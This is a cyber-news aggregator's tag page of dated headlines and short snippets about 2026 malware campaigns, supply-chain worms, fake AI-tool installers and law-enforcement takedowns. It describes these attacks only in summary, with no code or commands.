Collecting Cyber-News from over 60 sources

Tag: infection

Authorities Seize 106 Servers and 101 Domains in Major SocGholish Malware Takedown

Jun 19, 2026 7:33 AM

Tags: cyber, cybercrime, exploit, group, infection, infrastructure, international, law, malware, russia

International law enforcement agencies have successfully seized 106 servers and 101 domains as part of a coordinated global effort against the SocGholish malware infrastructure, marking a major milestone in Operation Endgame. Announced on June 18, 2026, from The Hague, this operation targeted a crucial infection chain exploited by cybercriminal groups, including the infamous Russia-linked group…
Sapphire Sleet macOS Malware Abuses curlosascript Execution for Multi-Stage Payload Delivery

Jun 17, 2026 2:02 PM

Tags: cyber, infection, macOS, malware, update

Sapphire Sleet’s latest macOS campaign uses crafted .scpt AppleScript lures that pipe curl output directly to osascript, enabling a compact, multi-stage payload chain that executes entirely within Script Editor and evades many built”‘in macOS protections. The infection begins with a socially engineered lure fake SDK or update AppleScript files such as Zoom SDK Update.scpt or…
Fileless Phantom Stealer Targets Browser Credentials

Jun 17, 2026 1:02 AM

Tags: credentials, infection, malware

In addition to executing entirely in memory, the malware’s infection chain incorporates other anti-analysis techniques designed to frustrate detection. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/fileless-phantom-stealer-targets-browser-credentials
Miasma Worm Hits Microsoft’s AI Coding Ecosystem

Jun 8, 2026 10:42 PM

Tags: ai, credentials, infection, intelligence, malicious, microsoft, supply-chain, tool, worm

Attackers Compromised More Than 70 Microsoft Repositories in Under 2 Minutes. Attackers linked to the Miasma supply-chain campaign compromised a Microsoft contributor account and pushed malicious code into more than 70 repositories, using artificial intelligence-assisted coding tools as an infection path to steal credentials and developer secrets at scale. First seen on govinfosecurity.com Jump to…
Malspam Campaign Abuses DoubleClick to Deploy Stealthy .NET Loader

Jun 6, 2026 12:43 PM

Tags: attack, cyber, defense, email, exploit, google, infection, infrastructure, malicious

A sophisticated new malspam campaign is actively exploiting Google’s DoubleClick ad-tracking infrastructure to bypass enterprise email security gateways. Discovered by researchers at Huntress, the attack utilizes highly personalized dynamic lures to initiate a complex, five-stage infection chain that actively dismantles local defenses before deploying process-hollowed payloads. The attack chain begins with a malicious HTML attachment,…
Hackers Use SEO Poisoning to Fake Gemini CLI, Claude Installers

May 23, 2026 11:00 AM

Tags: ai, cyber, google, hacker, infection, powershell, supply-chain, threat

Financially motivated threat actors are running an active campaign that impersonates Google’s Gemini CLI and Anthropic’s Claude Code, using SEO poisoning to deliver a fileless PowerShell infostealer to developer workstations worldwide. First identified in early March 2026 by EclecticIQ researchers, the campaign represents a calculated escalation in supply-chain-focused eCrime targeting AI developer tooling. The infection…
Hackers Use SEO Poisoning to Fake Gemini CLI, Claude Installers

May 23, 2026 11:00 AM

Tags: ai, cyber, google, hacker, infection, powershell, supply-chain, threat

Financially motivated threat actors are running an active campaign that impersonates Google’s Gemini CLI and Anthropic’s Claude Code, using SEO poisoning to deliver a fileless PowerShell infostealer to developer workstations worldwide. First identified in early March 2026 by EclecticIQ researchers, the campaign represents a calculated escalation in supply-chain-focused eCrime targeting AI developer tooling. The infection…
macOS Malware Abuses Fake Google Update for Persistence

May 19, 2026 2:00 PM

Tags: cyber, data, google, infection, macOS, malware, software, theft, update

A newly observed variant of the SHub macOS infostealer, dubbed “Reaper,” is expanding its capabilities with stealthier delivery, enhanced data theft, and a persistence mechanism disguised as a legitimate Google software update. The Reaper variant continues SHub’s use of fake application installers, notably masquerading as WeChat and Miro downloads. However, its infection chain stands out…
7 tips for accelerating cyber incident recovery

May 19, 2026 12:00 PM

Tags: attack, awareness, backup, breach, business, ceo, cio, ciso, cloud, communications, control, cyber, cybersecurity, data, defense, finance, framework, governance, incident, incident response, infection, insurance, international, lessons-learned, malicious, malware, monitoring, nist, risk, service, technology, threat, update

Emphasize scoping and containment from the outset: Because you can’t recover from what you can’t stop, scoping and containment should be the absolute first priority during incident recovery, says Amit Basu, CIO and CISO at freight shipping firm International Seaway.”Before anything else, you must stop the bleeding,” he says. This means understanding the true scope…
JavaScript Malware Campaign Drops Crypto Clipper via PowerShell

May 19, 2026 10:00 AM

Tags: attack, control, crypto, cyber, detection, infection, malicious, malware, powershell

A large-scale CountLoader campaign that uses layered obfuscation, multi-stage payload delivery, and covert command-and-control (C2) communication to deploy cryptocurrency clipper malware. The campaign stands out for its complex infection chain, combining JavaScript, PowerShell, and in-memory shellcode execution to evade detection and maintain persistence across infected systems. The attack begins with a malicious executable that launches…
Google Launches Android Spyware Forensics Tool for High-Risk Users

May 14, 2026 4:00 PM

Tags: android, google, infection, risk, spyware, tool

Google’s Android Advanced Protection Mode is getting a new feature allowing trusted security experts to investigate potential spyware infections First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/google-launches-android-spyware/
Worm Redux: Fresh Mini Shai-Hulud Infections Bite Supply Chain

May 12, 2026 7:19 PM

Tags: credentials, infection, open-source, supply-chain, worm

Hundreds of npm packages infected by the self-propagating, credential-stealing worm from TeamPCP are related to the open source TanStack ecosystem. First seen on darkreading.com Jump to article: www.darkreading.com/application-security/worm-redux-fresh-mini-shai-hulud-infections-bite-supply-chain
New PCPJack worm steals credentials, cleans TeamPCP infections

May 7, 2026 9:48 PM

Tags: access, cloud, credentials, data-breach, framework, infection, infrastructure, malware, worm

A new malware framework called PCPJack is stealing credentials from exposed cloud infrastructure while actively removing TeamPCP’s access to the systems. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-pcpjack-worm-steals-credentials-cleans-teampcp-infections/
Fake Claude AI Installers Used to Spread Malware in New Cyber Scam

May 7, 2026 12:48 PM

Tags: ai, cyber, google, guide, hacker, infection, malware, scam, windows

Hackers are abusing fake Claude AI installer pages promoted through Google Ads to trick users into running malware in a campaign. The operation combines highly realistic install guides with a stealthy, multi”‘stage infection chain that abuses trusted Windows components, fileless execution, and advanced evasion techniques to stay under the radar. Victims who click these ads…
MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack

May 6, 2026 4:48 PM

Tags: attack, credentials, group, hacking, infection, iran, microsoft, ransomware, social-engineering

The Iranian state-sponsored hacking group known as MuddyWater (aka Mango Sandstorm, Seedworm, and Static Kitten) has been attributed to a ransomware attack in what has been described as a “false flag” operation.The attack, observed by Rapid7 in early 2026, has been found to leverage social engineering techniques via Microsoft Teams to initiate the infection sequence.…
Widely used Daemon Tools disk app backdoored in monthlong supply-chain attack

May 5, 2026 11:47 PM

Tags: attack, infection, supply-chain, tool

Daemon Tools users: It’s time to check your machines for stealthy infections, stat. First seen on arstechnica.com Jump to article: arstechnica.com/security/2026/05/widely-used-daemon-tools-disk-app-backdoored-in-monthlong-supply-chain-attack/
Widely used Daemon Tools disk app backdoored in monthlong supply-chain attack

May 5, 2026 10:48 PM

Tags: attack, infection, supply-chain, tool

Daemon Tools users: It’s time to check your machines for stealthy infections, stat. First seen on arstechnica.com Jump to article: arstechnica.com/security/2026/05/widely-used-daemon-tools-disk-app-backdoored-in-monthlong-supply-chain-attack/
Kaspersky suspects Chinese hackers planted a backdoor into Daemon Tools in ‘widespread’ attack

May 5, 2026 5:49 PM

Tags: attack, backdoor, china, cybersecurity, hacker, infection, kaspersky, malicious, tool, windows

The cybersecurity company says it’s seen thousands of infection attempts, and at least a dozen successful hacks after users installed malicious versions of the popular Windows software. First seen on techcrunch.com Jump to article: techcrunch.com/2026/05/05/kaspersky-suspects-chinese-hackers-planted-a-backdoor-into-daemon-tools-in-widespread-attack/
Stealthy malware abuses Microsoft Phone Link to siphon SMS OTPs from enterprise PCs

May 5, 2026 1:48 PM

Tags: access, control, credentials, data, detection, infection, infrastructure, malicious, malware, microsoft, phone, rat, rust, startup, theft, threat, tool, update, windows

Multi-stage infection chain: The intrusion begins with an unknown initial access vector, followed by the execution of a malicious file disguised as a ScreenConnect update, Talos said.The initial payload is a Rust-compiled loader using filenames such as “systemupdates.exe,” which drops a .NET loader disguised as a text file in a system directory, the post said.Persistence…
ClickFix Attack Swaps PowerShell for Cmdkey, Remote Regsvr32 Payloads

Apr 27, 2026 9:39 AM

Tags: attack, captcha, cyber, cybersecurity, infection, phishing, powershell, windows

A newly identified ClickFix attack variant is raising concerns among cybersecurity researchers after it was observed replacing traditional PowerShell-based delivery with a stealthier technique leveraging native Windows utilities. The infection begins with a familiar ClickFix tactic: a phishing page disguised as a CAPTCHA verification prompt. Victims are instructed to press Win + R, paste a…
Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener

Apr 23, 2026 5:39 AM

Tags: access, api, attack, backdoor, china, cloud, control, data, detection, github, infection, intelligence, korea, login, malicious, malware, military, monitoring, network, open-source, service, tactics, threat, tool, windows

IntroductionOn March 12, 2026, Zscaler ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals. Our analysis of this sample uncovered a campaign leveraging a multi-stage attack chain where a trojanized SumatraPDF reader deploys an AdaptixC2 Beacon agent, ultimately leading to the download and abuse of Visual Studio (VS) Code tunnels for…
DPRK Fake Job Scams Self-Propagate in ‘Contagious Interview’

Apr 22, 2026 5:39 PM

Tags: access, infection, jobs, scam, worm

A compromised developer’s repository serves as a worm-like infection vector to spread remote access Trojans (RATs) and other malware. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/dprk-fake-job-scams-self-propagate-contagious-interview
The Gentlemen Ransomware Expands With Rapid Affiliate Growth

Apr 21, 2026 4:39 PM

Tags: attack, infection, ransomware

Gentlemen RaaS expands quickly with multi-platform attacks and SystemBC-linked infections First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/gentlemen-ransomware-rapid/
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 93

Apr 19, 2026 4:38 PM

Tags: access, attack, computer, finance, infection, international, malware, threat

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape CPU-Z / HWMonitor watering hole infection a copy-pasted attack Fake Claude site installs malware that gives attackers access to your computer Malware Analysis Static SKILL for Codex JanelaRAT: a financial threat targeting users in Latin […]…
Weaponized CVE-2026-39987 Pushes Blockchain Backdoor Through Hugging Face

Apr 17, 2026 10:38 AM

Tags: backdoor, blockchain, credentials, cve, cyber, exploit, infection, rce, remote-code-execution, theft

Attackers are rapidly exploiting CVE-2026-39987 in the marimo Python notebook platform to deploy a new NKAbuse backdoor variant hosted on Hugging Face Spaces, turning AI/ML developer environments into high”‘value infection points. The campaign combines pre-auth RCE, credential theft, lateral movement to PostgreSQL and Redis, and a blockchain-based C2 channel that is difficult to monitor or…
PlugX USB Worm Hits Multiple Continents via DLL Sideloading

Apr 14, 2026 3:52 PM

Tags: cyber, infection, worm

A new PlugX USB worm variant is driving fresh infection waves across several continents, using DLL sideloading and stealthy USB-based propagation to evade detection. First observed in Papua New Guinea in August 2022, the same strain resurfaced months later not only in the Pacific Rim but also in Ghana, Mongolia, Zimbabwe, and Nigeria, underscoring a…
Fake Proxifier GitHub Installer Spreads ClipBanker Crypto Malware

Apr 14, 2026 7:52 AM

Tags: crypto, cyber, github, hacker, infection, malware

Hackers are abusing a fake Proxifier installer hosted on GitHub to deliver a multi”‘stage ClipBanker malware that silently hijacks cryptocurrency transactions from infected systems. The campaign combines search”‘engine poisoning, trojanized installers, and fileless techniques to stay under the radar while swapping victims’ wallet addresses with those controlled by attackers. The infection typically begins when users…
Qilin Ransomware Deploys Malicious DLL to Disable Most EDR Defenses

Apr 3, 2026 7:50 AM

Tags: antivirus, cyber, defense, detection, edr, endpoint, group, infection, malicious, ransomware

The Qilin ransomware group has developed a highly sophisticated infection chain that targets and disables over 300 endpoint detection and response (EDR) solutions. As defenders improve behavioral detection capabilities, attackers are increasingly targeting the defense layer itself during the early stages of a breach. By deploying a malicious >>msimg32.dll<< file, attackers can bypass traditional antivirus…
Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials

Apr 2, 2026 10:51 PM

Tags: api, breach, credentials, cve, exploit, github, hacker, infection, service, threat, vulnerability

A large-scale credential harvesting operation has been observed exploiting the React2Shell vulnerability as an initial infection vector to steal database credentials, SSH private keys, Amazon Web Services (AWS) secrets, shell command history, Stripe API keys, and GitHub tokens at scale.Cisco Talos has attributed the operation to a threat cluster it tracks as First seen on…
Researchers Uncover Mining Operation Using ISO Lures to Spread RATs and Crypto Miners

Apr 2, 2026 2:51 PM

Tags: access, crypto, fraud, infection, rat, software, threat

A financially motivated operation codenamed REF1695 has been observed leveraging fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023.”Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration,” Elastic First seen on thehackernews.com Jump to…